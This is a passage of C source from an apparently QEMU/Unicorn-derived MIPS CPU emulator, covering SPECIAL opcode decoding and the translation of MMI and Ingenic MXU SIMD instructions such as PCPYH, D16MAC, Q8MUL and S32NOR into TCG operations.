case OPC_SUB: case OPC_SUBU: gen_arith(ctx, op1, rd, rs, rt); break; case OPC_SLLV: /* Shifts */ case OPC_SRAV: gen_shift(ctx, op1, rd, rs, rt); break; case OPC_SRLV: switch ((ctx->opcode >> 6) & 0x1f) { case 1: /* rotrv is decoded as srlv on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_ROTRV; } /* Fallthrough */ case 0: gen_shift(ctx, op1, rd, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SLT: /* Set on less than */ case OPC_SLTU: gen_slt(ctx, op1, rd, rs, rt); break; case OPC_AND: /* Logic*/ case OPC_OR: case OPC_NOR: case OPC_XOR: gen_logic(ctx, op1, rd, rs, rt); break; case OPC_JALR: gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); break; case OPC_TGE: /* Traps */ case OPC_TGEU: case OPC_TLT: case OPC_TLTU: case OPC_TEQ: case OPC_TNE: check_insn(ctx, ISA_MIPS2); gen_trap(ctx, op1, rs, rt, -1); break; case OPC_LSA: /* OPC_PMON */ if ((ctx->insn_flags & ISA_MIPS32R6) || (env->CP0_Config3 & (1 << CP0C3_MSAP))) { decode_opc_special_r6(env, ctx); } else { /* Pmon entry point, also R4010 selsl */ #ifdef 
MIPS_STRICT_STANDARD MIPS_INVAL("PMON / selsl"); generate_exception_end(ctx, EXCP_RI); #else gen_helper_0e0i(pmon, sa); #endif } break; case OPC_SYSCALL: generate_exception_end(ctx, EXCP_SYSCALL); break; case OPC_BREAK: generate_exception_end(ctx, EXCP_BREAK); break; case OPC_SYNC: check_insn(ctx, ISA_MIPS2); gen_sync(tcg_ctx, extract32(ctx->opcode, 6, 5)); break; #if defined(TARGET_MIPS64) /* MIPS64 specific opcodes */ case OPC_DSLL: case OPC_DSRA: case OPC_DSLL32: case OPC_DSRA32: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, op1, rd, rt, sa); break; case OPC_DSRL: switch ((ctx->opcode >> 21) & 0x1f) { case 1: /* drotr is decoded as dsrl on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_DROTR; } /* Fallthrough */ case 0: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, op1, rd, rt, sa); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DSRL32: switch ((ctx->opcode >> 21) & 0x1f) { case 1: /* drotr32 is decoded as dsrl32 on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_DROTR32; } /* Fallthrough */ case 0: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, op1, rd, rt, sa); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DADD: case OPC_DADDU: case OPC_DSUB: case OPC_DSUBU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith(ctx, op1, rd, rs, rt); break; case OPC_DSLLV: case OPC_DSRAV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, op1, rd, rs, rt); break; case OPC_DSRLV: switch ((ctx->opcode >> 6) & 0x1f) { case 1: /* drotrv is decoded as dsrlv on non-R2 CPUs */ if (ctx->insn_flags & ISA_MIPS32R2) { op1 = OPC_DROTRV; } /* Fallthrough */ case 0: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, op1, rd, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DLSA: if ((ctx->insn_flags & ISA_MIPS32R6) || (env->CP0_Config3 & (1 << CP0C3_MSAP))) { decode_opc_special_r6(env, ctx); } break; #endif default: if (ctx->insn_flags & ISA_MIPS32R6) { decode_opc_special_r6(env, ctx); } else if (ctx->insn_flags & INSN_R5900) { decode_opc_special_tx79(env, ctx); } else { decode_opc_special_legacy(env, ctx); } } } #if defined(TARGET_MIPS64) /* * * MMI (MultiMedia Interface) ASE instructions * =========================================== */ /* * MMI instructions category: data communication * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * PCPYH PEXCH PEXTLB PINTH PPACB PEXT5 PREVH * PCPYLD PEXCW PEXTLH PINTEH PPACH PPAC5 PROT3W * PCPYUD PEXEH PEXTLW PPACW * PEXEW PEXTUB * PEXTUH * PEXTUW */ /* * PCPYH rd, rt * * Parallel Copy Halfword * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---------+---------+-----------+ * | MMI |0 0 0 0 0| rt | rd | PCPYH | MMI3 | * +-----------+---------+---------+---------+---------+-----------+ */ static void gen_mmi_pcpyh(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pd, rt, rd; uint32_t opcode; opcode = ctx->opcode; pd = extract32(opcode, 21, 5); rt = extract32(opcode, 16, 5); rd = extract32(opcode, 11, 5); if (unlikely(pd != 0)) { generate_exception_end(ctx, EXCP_RI); } else if (rd == 0) { /* nop */ } else if (rt == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], 0); } else { TCGv_i64 t0 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new(tcg_ctx); uint64_t mask = (1ULL << 16) - 1; tcg_gen_andi_i64(tcg_ctx, t0, 
tcg_ctx->cpu_gpr[rt], mask); tcg_gen_movi_i64(tcg_ctx, t1, 0); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1); tcg_gen_andi_i64(tcg_ctx, t0, tcg_ctx->cpu_mmr[rt], mask); tcg_gen_movi_i64(tcg_ctx, t1, 0); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } } /* * PCPYLD rd, rs, rt * * Parallel Copy Lower Doubleword * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---------+---------+-----------+ * | MMI | rs | rt | rd | PCPYLD | MMI2 | * +-----------+---------+---------+---------+---------+-----------+ */ static void gen_mmi_pcpyld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t rs, rt, rd; uint32_t opcode; opcode = ctx->opcode; rs = extract32(opcode, 21, 5); rt = extract32(opcode, 16, 5); rd = extract32(opcode, 11, 5); if (rd == 0) { /* nop */ } else { if (rs == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], 0); } else { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], tcg_ctx->cpu_gpr[rs]); } if (rt == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } else { if (rd != rt) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } } } } /* * PCPYUD rd, rs, rt * * Parallel Copy Upper Doubleword * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---------+---------+-----------+ * | MMI | rs | rt | rd | PCPYUD | MMI3 | * +-----------+---------+---------+---------+---------+-----------+ */ static void gen_mmi_pcpyud(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t rs, rt, rd; uint32_t opcode; opcode = ctx->opcode; rs = extract32(opcode, 21, 5); rt = extract32(opcode, 16, 5); rd = extract32(opcode, 11, 5); if (rd == 0) { /* nop */ } else { if (rs == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } else { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_mmr[rs]); } if (rt == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], 0); } else { if (rd != rt) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], tcg_ctx->cpu_mmr[rt]); } } } } #endif #if !defined(TARGET_MIPS64) /* MXU accumulate add/subtract 1-bit pattern 'aptn1' */ #define MXU_APTN1_A 0 #define MXU_APTN1_S 1 /* MXU accumulate add/subtract 2-bit pattern 'aptn2' */ #define MXU_APTN2_AA 0 #define MXU_APTN2_AS 1 #define MXU_APTN2_SA 2 #define MXU_APTN2_SS 3 /* MXU execute add/subtract 2-bit pattern 'eptn2' */ #define MXU_EPTN2_AA 0 #define MXU_EPTN2_AS 1 #define MXU_EPTN2_SA 2 #define MXU_EPTN2_SS 3 /* MXU operand getting pattern 'optn2' */ #define MXU_OPTN2_PTN0 0 #define MXU_OPTN2_PTN1 1 #define MXU_OPTN2_PTN2 2 #define MXU_OPTN2_PTN3 3 /* alternative naming scheme for 'optn2' */ #define MXU_OPTN2_WW 0 #define MXU_OPTN2_LW 1 #define MXU_OPTN2_HW 2 #define MXU_OPTN2_XW 3 /* MXU operand getting pattern 'optn3' */ #define MXU_OPTN3_PTN0 0 #define MXU_OPTN3_PTN1 1 #define MXU_OPTN3_PTN2 2 #define MXU_OPTN3_PTN3 3 #define MXU_OPTN3_PTN4 4 #define MXU_OPTN3_PTN5 5 #define 
MXU_OPTN3_PTN6 6 #define MXU_OPTN3_PTN7 7 /* * S32I2M XRa, rb - Register move from GRF to XRF */ static void gen_mxu_s32i2m(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; uint32_t XRa, Rb; t0 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 5); Rb = extract32(ctx->opcode, 16, 5); gen_load_gpr(tcg_ctx, t0, Rb); if (XRa <= 15) { gen_store_mxu_gpr(tcg_ctx, t0, XRa); } else if (XRa == 16) { gen_store_mxu_cr(tcg_ctx, t0); } tcg_temp_free(tcg_ctx, t0); } /* * S32M2I XRa, rb - Register move from XRF to GRF */ static void gen_mxu_s32m2i(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; uint32_t XRa, Rb; t0 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 5); Rb = extract32(ctx->opcode, 16, 5); if (XRa <= 15) { gen_load_mxu_gpr(tcg_ctx, t0, XRa); } else if (XRa == 16) { gen_load_mxu_cr(tcg_ctx, t0); } gen_store_gpr(tcg_ctx, t0, Rb); tcg_temp_free(tcg_ctx, t0); } /* * S8LDD XRa, Rb, s8, optn3 - Load a byte from memory to XRF */ static void gen_mxu_s8ldd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; uint32_t XRa, Rb, s8, optn3; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); s8 = extract32(ctx->opcode, 10, 8); optn3 = extract32(ctx->opcode, 18, 3); Rb = extract32(ctx->opcode, 21, 5); gen_load_gpr(tcg_ctx, t0, Rb); tcg_gen_addi_tl(tcg_ctx, t0, t0, (int8_t)s8); switch (optn3) { /* XRa[7:0] = tmp8 */ case MXU_OPTN3_PTN0: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 0, 8); break; /* XRa[15:8] = tmp8 */ case MXU_OPTN3_PTN1: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 8, 8); break; /* XRa[23:16] = tmp8 */ case MXU_OPTN3_PTN2: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 16, 8); break; /* XRa[31:24] = tmp8 */ case MXU_OPTN3_PTN3: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 24, 8); break; /* XRa = {8'b0, tmp8, 8'b0, tmp8} */ case MXU_OPTN3_PTN4: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); tcg_gen_deposit_tl(tcg_ctx, t0, t1, t1, 16, 16); break; /* XRa = {tmp8, 8'b0, tmp8, 8'b0} */ case MXU_OPTN3_PTN5: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); tcg_gen_shli_tl(tcg_ctx, t1, t1, 8); tcg_gen_deposit_tl(tcg_ctx, t0, t1, t1, 16, 16); break; /* XRa = {{8{sign of tmp8}}, tmp8, {8{sign of tmp8}}, tmp8} */ case MXU_OPTN3_PTN6: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_SB); tcg_gen_mov_tl(tcg_ctx, t0, t1); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0xFF00FFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 16); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); break; /* XRa = {tmp8, tmp8, tmp8, tmp8} */ case MXU_OPTN3_PTN7: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); tcg_gen_deposit_tl(tcg_ctx, t1, t1, t1, 8, 8); tcg_gen_deposit_tl(tcg_ctx, t0, t1, t1, 16, 16); break; } gen_store_mxu_gpr(tcg_ctx, t0, XRa); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* * D16MUL XRa, XRb, XRc, XRd, optn2 - Signed 16 bit pattern multiplication */ static void gen_mxu_d16mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2, t3; uint32_t XRa, XRb, XRc, XRd, optn2; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); t3 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 
6, 4); XRb = extract32(ctx->opcode, 10, 4); XRc = extract32(ctx->opcode, 14, 4); XRd = extract32(ctx->opcode, 18, 4); optn2 = extract32(ctx->opcode, 22, 2); gen_load_mxu_gpr(tcg_ctx, t1, XRb); tcg_gen_sextract_tl(tcg_ctx, t0, t1, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t1, t1, 16, 16); gen_load_mxu_gpr(tcg_ctx, t3, XRc); tcg_gen_sextract_tl(tcg_ctx, t2, t3, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t3, t3, 16, 16); switch (optn2) { case MXU_OPTN2_WW: /* XRB.H*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_LW: /* XRB.L*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_HW: /* XRB.H*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; case MXU_OPTN2_XW: /* XRB.L*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; } gen_store_mxu_gpr(tcg_ctx, t3, XRa); gen_store_mxu_gpr(tcg_ctx, t2, XRd); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); } /* * D16MAC XRa, XRb, XRc, XRd, aptn2, optn2 - Signed 16 bit pattern multiply * and accumulate */ static void gen_mxu_d16mac(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2, t3; uint32_t XRa, XRb, XRc, XRd, optn2, aptn2; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); t3 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); XRb = extract32(ctx->opcode, 10, 4); XRc = extract32(ctx->opcode, 14, 4); XRd = extract32(ctx->opcode, 18, 4); optn2 = extract32(ctx->opcode, 22, 2); aptn2 = extract32(ctx->opcode, 24, 2); gen_load_mxu_gpr(tcg_ctx, t1, XRb); tcg_gen_sextract_tl(tcg_ctx, t0, t1, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t1, t1, 16, 16); gen_load_mxu_gpr(tcg_ctx, t3, XRc); tcg_gen_sextract_tl(tcg_ctx, t2, t3, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t3, t3, 16, 16); switch (optn2) { case MXU_OPTN2_WW: /* XRB.H*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_LW: /* XRB.L*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_HW: /* XRB.H*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; case MXU_OPTN2_XW: /* XRB.L*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; } gen_load_mxu_gpr(tcg_ctx, t0, XRa); gen_load_mxu_gpr(tcg_ctx, t1, XRd); switch (aptn2) { case MXU_APTN2_AA: tcg_gen_add_tl(tcg_ctx, t3, t0, t3); tcg_gen_add_tl(tcg_ctx, t2, t1, t2); break; case MXU_APTN2_AS: tcg_gen_add_tl(tcg_ctx, t3, t0, t3); tcg_gen_sub_tl(tcg_ctx, t2, t1, t2); break; case MXU_APTN2_SA: tcg_gen_sub_tl(tcg_ctx, t3, t0, t3); tcg_gen_add_tl(tcg_ctx, t2, t1, t2); break; case MXU_APTN2_SS: tcg_gen_sub_tl(tcg_ctx, t3, t0, t3); tcg_gen_sub_tl(tcg_ctx, t2, t1, t2); break; } gen_store_mxu_gpr(tcg_ctx, t3, XRa); gen_store_mxu_gpr(tcg_ctx, t2, XRd); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); } /* * Q8MUL XRa, XRb, XRc, XRd - Parallel unsigned 8 bit pattern multiply * Q8MULSU XRa, XRb, XRc, XRd - Parallel signed 8 bit pattern multiply */ static void gen_mxu_q8mul_q8mulsu(DisasContext *ctx) { TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; TCGv t0, t1, t2, t3, t4, t5, t6, t7; uint32_t XRa, XRb, XRc, XRd, sel; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); t3 = tcg_temp_new(tcg_ctx); t4 = tcg_temp_new(tcg_ctx); t5 = tcg_temp_new(tcg_ctx); t6 = tcg_temp_new(tcg_ctx); t7 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); XRb = extract32(ctx->opcode, 10, 4); XRc = extract32(ctx->opcode, 14, 4); XRd = extract32(ctx->opcode, 18, 4); sel = extract32(ctx->opcode, 22, 2); gen_load_mxu_gpr(tcg_ctx, t3, XRb); gen_load_mxu_gpr(tcg_ctx, t7, XRc); if (sel == 0x2) { /* Q8MULSU */ tcg_gen_ext8s_tl(tcg_ctx, t0, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8s_tl(tcg_ctx, t1, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8s_tl(tcg_ctx, t2, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8s_tl(tcg_ctx, t3, t3); } else { /* Q8MUL */ tcg_gen_ext8u_tl(tcg_ctx, t0, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8u_tl(tcg_ctx, t1, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8u_tl(tcg_ctx, t2, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8u_tl(tcg_ctx, t3, t3); } tcg_gen_ext8u_tl(tcg_ctx, t4, t7); tcg_gen_shri_tl(tcg_ctx, t7, t7, 8); tcg_gen_ext8u_tl(tcg_ctx, t5, t7); tcg_gen_shri_tl(tcg_ctx, t7, t7, 8); tcg_gen_ext8u_tl(tcg_ctx, t6, t7); tcg_gen_shri_tl(tcg_ctx, t7, t7, 8); tcg_gen_ext8u_tl(tcg_ctx, t7, t7); tcg_gen_mul_tl(tcg_ctx, t0, t0, t4); tcg_gen_mul_tl(tcg_ctx, t1, t1, t5); tcg_gen_mul_tl(tcg_ctx, t2, t2, t6); tcg_gen_mul_tl(tcg_ctx, t3, t3, t7); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0xFFFF); tcg_gen_andi_tl(tcg_ctx, t1, t1, 0xFFFF); tcg_gen_andi_tl(tcg_ctx, t2, t2, 0xFFFF); tcg_gen_andi_tl(tcg_ctx, t3, t3, 0xFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 16); tcg_gen_shli_tl(tcg_ctx, t3, t3, 16); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_or_tl(tcg_ctx, t1, t2, t3); gen_store_mxu_gpr(tcg_ctx, t0, XRd); gen_store_mxu_gpr(tcg_ctx, t1, XRa); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t4); tcg_temp_free(tcg_ctx, t5); tcg_temp_free(tcg_ctx, t6); tcg_temp_free(tcg_ctx, t7); } /* * S32LDD XRa, Rb, S12 - Load a word from memory to XRF * S32LDDR XRa, Rb, S12 - Load a word from memory to XRF, reversed byte seq. */ static void gen_mxu_s32ldd_s32lddr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; uint32_t XRa, Rb, s12, sel; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); s12 = extract32(ctx->opcode, 10, 10); sel = extract32(ctx->opcode, 20, 1); Rb = extract32(ctx->opcode, 21, 5); gen_load_gpr(tcg_ctx, t0, Rb); tcg_gen_movi_tl(tcg_ctx, t1, s12); tcg_gen_shli_tl(tcg_ctx, t1, t1, 2); if (s12 & 0x200) { tcg_gen_ori_tl(tcg_ctx, t1, t1, 0xFFFFF000); } tcg_gen_add_tl(tcg_ctx, t1, t0, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t1, ctx->mem_idx, MO_SL); if (sel == 1) { /* S32LDDR */ tcg_gen_bswap32_tl(tcg_ctx, t1, t1); } gen_store_mxu_gpr(tcg_ctx, t1, XRa); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* * MXU instruction category: logic * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * S32NOR S32AND S32OR S32XOR */ /* * S32NOR XRa, XRb, XRc * Update XRa with the result of logical bitwise 'nor' operation * applied to the content of XRb and XRc. 
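* For example (illustrative operand values, not from any spec): XRb = 0xF0F0F0F0 and XRc = 0x0000FFFF would yield XRa = ~(0xF0F0F0F0 | 0x0000FFFF) = 0x0F0F0000.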
* * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32NOR(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to all 1s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0xFFFFFFFF); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just set destination to the negation of XRc */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else if (unlikely(XRc == 0)) { /* XRc zero register -> just set destination to the negation of XRb */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to the negation of XRb */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ tcg_gen_nor_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * S32AND XRa, XRb, XRc * Update XRa with the result of logical bitwise 'and' operation * applied to the content of XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32AND(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) || (XRc == 0))) { /* one of operands zero register -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ tcg_gen_and_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * S32OR XRa, XRb, XRc * Update XRa with the result of logical bitwise 'or' operation * applied to the content of XRb and XRc. 
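* For example (illustrative operand values): XRb = 0xF0F0F0F0 and XRc = 0x0000FFFF would yield XRa = 0xF0F0F0F0 | 0x0000FFFF = 0xF0F0FFFF.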
* * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32OR(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination 